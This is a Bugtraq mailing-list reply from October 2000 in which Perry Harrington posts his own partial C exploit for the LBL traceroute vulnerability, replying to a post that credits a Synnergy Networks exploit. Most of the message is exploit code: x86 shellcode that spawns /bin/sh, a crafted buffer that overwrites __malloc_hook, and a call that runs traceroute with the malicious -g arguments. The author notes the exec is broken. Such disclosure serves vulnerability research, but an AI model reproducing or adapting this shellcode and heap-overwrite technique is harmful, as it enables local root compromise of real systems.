[17065] in bugtraq
Re: Traceroute exploit + story
daemon@ATHENA.MIT.EDU (Harrington, Perry)
Thu Oct 5 18:36:46 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <200010051937.MAA08092@eris>
Date: Thu, 5 Oct 2000 12:37:10 -0700
Reply-To: pedward@WEBCOM.COM
From: "Harrington, Perry" <pedward@WEBCOM.COM>
X-To: W.H.J.Pinckaers@cpedu.rug.nl
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <C18A9D0707@cpedu1.cpedu.rug.nl> from "W.H.J.Pinckaers" at Oct
05, 2000 04:09:20 PM
Hmm, this looks a lot like my post on the subject. The exploit
I was working on was a lot simplier. It seems that some person
chose to ignore my post which further explained my work and
trashcan it (ahem).
--Perry
PS, the exec below is broken, otherwise it might work.
This was my code I started on:
#include <stdio.h>
#include <unistd.h>
#include <string.h>
char code[] =
"\xeb\x34" /* jmp GETADDR */
"\x90\x90\x90\x90" /* nop nop nop nop */
"\x90\x90\x90\x90" /* nop nop nop nop */
"\x90\x90\x90\x90" /* nop nop nop nop */
"\x90\x90\x90\x90" /* nop nop nop nop */
/* RUNPROG: */
"\x5e" /* popl %esi */
"\x89\x76\x08" /* movl %esi,0x8(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %al,0x7(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xfe\x06" /* incb (%esi) */
"\xfe\x46\x04" /* incb 0x4(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xd8" /* movl %ebx,%eax */
"\x40" /* incl %eax */
"\xcd\x80" /* int $0x80 */
/* GETADDR: */
"\xe8\xd7\xff\xff\xff" /* call RUNPROG */
".bin.sh"; /* Program to run .XXX.XX */
extern void *__malloc_hook;
typedef struct glue {
int a;
int b;
void *p;
void *q;
} glue;
void print_hex(char *p)
{
char *q;
q=p;
while(*q) {
if (*q > 32 && *q < 127) {
printf("%c",*q);
} else {
printf(" ");
}
q++;
}
}
int main(void)
{
int ipa=0x2E312E31;
int ipb=0x20312E31;
int oh=0x00000000;
int dummy=0x43434343;
void *mh=(void **)__malloc_hook;
void *usage=(void *)0x804a858;
/* void *us=(void *)0x804cd80;*/
void *us=(void *)0x804cd7a;
char buf[260];
char whocares[4096];
char *prog="/tmp/traceroute";
glue temp;
FILE *out;
printf ("malloc_hook %x code %x\n",mh, usage);
memset(buf, 0x47,256);
buf[255]='\0';
printf ("buf: %s\n", buf);
temp.a=ipa;
temp.b=ipb;
temp.p=mh;
temp.q=us+16;
memcpy(buf, (void *)&temp,16);
printf ("buf: %s\n", buf);
temp.p=(void *)oh;
temp.q=(void *)oh;
temp.a=dummy;
/* temp.b=dummy;*/
temp.b=0xFFFFFF01;
printf("code(%d)\n", sizeof(code));
strncpy(buf+16, code, sizeof(code) -1);
memcpy(buf+240, (void *)&temp, 0x10);
printf ("buf: %s\n", buf);
buf[255]='\0';
out=fopen("/tmp/code","w");
fputs(buf,out);
fclose(out);
printf("%s\n",whocares);
execl(prog,prog,prog,"-g",buf,"-g 1","127.0.0.1", NULL);
return 0;
}
>
> LBL traceroute exploit.
>
> By Dvorak, Synnergy Networks
> www.synnergy.net
>
--
Perry Harrington Director of zelur xuniL ()
perry@webcom.com System Architecture Think Blue. /\
